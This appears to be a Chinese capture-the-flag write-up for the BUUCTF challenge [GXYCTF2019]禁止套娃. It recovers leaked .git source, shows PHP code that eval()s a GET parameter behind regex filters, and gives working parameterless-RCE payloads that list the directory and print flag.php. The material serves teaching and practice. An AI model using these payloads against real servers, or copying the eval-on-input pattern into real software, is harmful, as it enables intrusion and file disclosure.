2. 程式人生 > 實用技巧 >BUUCTF-[GXYCTF2019]禁止套娃

BUUCTF-[GXYCTF2019]禁止套娃

阿新 發佈:2020-10-05

考點:.git洩露、無引數RCE
wscan掃到了/.git目錄

利用GitHack下載到原始碼

index.php:

<?php
include "flag.php";
echo "flag在哪裡呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("還差一點哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("還想讀flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

分析原始碼得出:
1、flag在flag.php
2、GET傳參exp
3、過濾了data://、filter://、php://、phar://這些偽協議,就不能用偽協議讀flag.php
4、preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])
用preg_replace()替換匹配到的字元為NULL空。
參考:無引數讀檔案和RCE總結

關於(?R)?

(?R)?菜雞在這裡糾結了很長時間,還是理解不了
傳入的exp引數只能包含小寫字母、,、_、(),還要以;結尾
5、過濾了一些函式,像et,file_get_contents()就不能用

無引數RCE要用到的幾個函式:

  • print_r(scandir('.'));檢視當前目錄下的所有檔名
  • localeconv() 函式返回一包含本地數字及貨幣格式資訊的陣列。
  • current() 函式返回陣列中的當前元素(單元),預設取第一個值,和pos()一樣

先檢視當前目錄下的所有檔名,但是這題不能有引數,找一個代替'.'的東西

print_r(scandir(current(localeconv())));打印出當前目錄下檔案

?exp=print_r(scandir(current(localeconv())));

flag.php在倒數第二個,直接用next(array_reverse());
paylaod:?exp=show_source(next(array_reverse(scandir(current(localeconv())))));

解題參考:
https://www.gem-love.com/ctf/530.html
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/
http://www.lovexyu.xyz/art.php?art_id=58
https://www.suk1.top/2020/02/05/GXY套娃/#array-rand-array-flip

相關推薦

BUUCTF-[GXYCTF2019]禁止

考點:.git洩露、無引數RCE 用wscan掃到了/.git目錄 利用GitHack下載到原始碼 index.php:

[GXYCTF2019]禁止 無引數RCE

復現一下buuctf上的[GXYCTF2019]禁止 BUUCTF增設了waf 所以fuzz都不能用了.. Git洩露,不知道為啥我的GitHack掃不到呢?(頭大)

0xctf[No parameters readfile](魔改版[GXYCTF2019]禁止)

  閱讀本文前建議先閱讀本站中的另一篇文章:[GXYCTF2019]禁止   重要參考連結:http://www.heetian.com/info/827

[GXYCTF2019]禁止

拿到這道題,抓包看了看,啥也沒有,考慮用dirsearch爆破目錄,未果,忍不住看了下大佬的wp,原來是./git原始碼洩露,當然這並沒有完,精彩的還在後面呢,我們來看一下這道題

禁止: 線段樹宗法樹

樹 這是一種思想, 不是什麼特定的資料結構, 不過實現起來一般都是從外層的樹形資料結構的每個節點上, 掛一個內層樹形資料結構的根的指標, 這樣, 本來是要查詢或修改外層節點的資訊的行為, 變成了在外層某節點對應

式資料夾如何通過Python批量處理

前言 在我對專案組的一些訓練影象進行預處理的時候,發現處理的影象是分好了類,在資料夾裡的資料夾裡,套娃式儲存的,所以對我批處理,以及按原資料夾規則進行儲存的時候,就會造成很大困擾

刷題[MRCTF2020]

解題思路 檢視原始碼,發現註釋中存在程式碼 //1st $query = $_SERVER[\'QUERY_STRING\'];

從俄羅斯開始的信封巢狀問題

354. 俄羅斯信封問題 很多演算法問題都需要排序技巧,其難點不在於排序本身,而是需要巧妙地排序進行預處理,將演算法問題進行轉換,為之後的操作打下基礎。

BUUCTF-[GXYCTF2019]BabySQli 1詳解

babysqli 注入題,開啟一個簡易的登入框,覺得出題人好像不是個完美主義者,登入框做的很爛,但是我是個弟弟,還是要說出題人牛逼

BUUCTF-[GXYCTF2019]BabyUpload Writeup

0x00 題目 0x01 解題過程 還是像上一篇wp一樣,這種比較容易的檔案上傳題目,有些步驟可以一步到位。我在這裡還是選擇一步一步來做。首先上傳一個php檔案。

簡單粗暴模式組json傳送https請求

  各位童鞋大家好,向來簡單粗暴的鐵柱兄給大家來玩一手套模式來組Json資料,不說別的,無腦

354.俄羅斯信封問題

給定一些標記了寬度和高度的信封,寬度和高度以整數對形式(w, h)出現。當另一個信封的寬度和高度都比這個信封大的時候,這個信封就可以放進另一個信封裡,如同俄羅斯一樣。

俄羅斯信封問題

俄羅斯套娃信封問題 題目: 給定一些標記了寬度和高度的信封,寬度和高度以整數對形式 (w, h) 出現。當另一個信封的寬度和高度都比這個信封大的時候,這個信封就可以放進另一個信封裡,如同俄羅斯套娃一樣。

俄羅斯

俄羅斯套娃信封問題 難度:困難 給定一些標記了寬度和高度的信封,寬度和高度以整數對形式(w, h)出現。當另一個信封的寬度和高度都比這個信封大的時候,這個信封就可以放進另一個信封裡,如同俄羅斯套娃一樣。

【LeetCode】354. Russian Doll Envelopes 俄羅斯信封問題(Hard)(JAVA)

技術標籤:Leetcodejavaleetcode資料結構演算法面試 【LeetCode】354. Russian Doll Envelopes 俄羅斯信封問題(Hard)(JAVA)

LeetCode 354. 俄羅斯信封問題(Python、動態規劃LIS、貪心+二分查詢)

技術標籤:LeetCode 動態規劃leetcodepython動態規劃快速排序演算法 學習這一演算法的思想,解決二維LIS問題,位元組跳動原題,值得反覆學習

LeetCode——354. 俄羅斯信封問題

技術標籤:C++leetcode動態規劃演算法動態規劃leetcode資料結構 題目描述: 給定一些標記了寬度和高度的信封,寬度和高度以整數對形式 (w, h) 出現。當另一個信封的寬度和高度都比這個信封大的時候,這個信封就可

LeetCode354:俄羅斯信封問題(python 動態規劃)

目錄 一、題目 二、示例 三、思路 四、程式碼 一、題目 給定一些標記了寬度和高度的信封,寬度和高度以整數對形式(w, h)出現。當另一個信封的寬度和高度都比這個信封大的時候,這個信封就可以放進另一個信封裡,如

3DM速報:“美末”竟是《戰神》創意來源 Epic商城券大促開啟

歡迎來到今日的三大媽速報 三分鐘帶你瞭解遊戲業最新資訊 大家好,我是米瑟

#貪心#洛谷 6093 [JSOI2015]

題目 分析 按好看度從大到小排序,每次選擇一個儘量大的外徑裝入當前的內徑,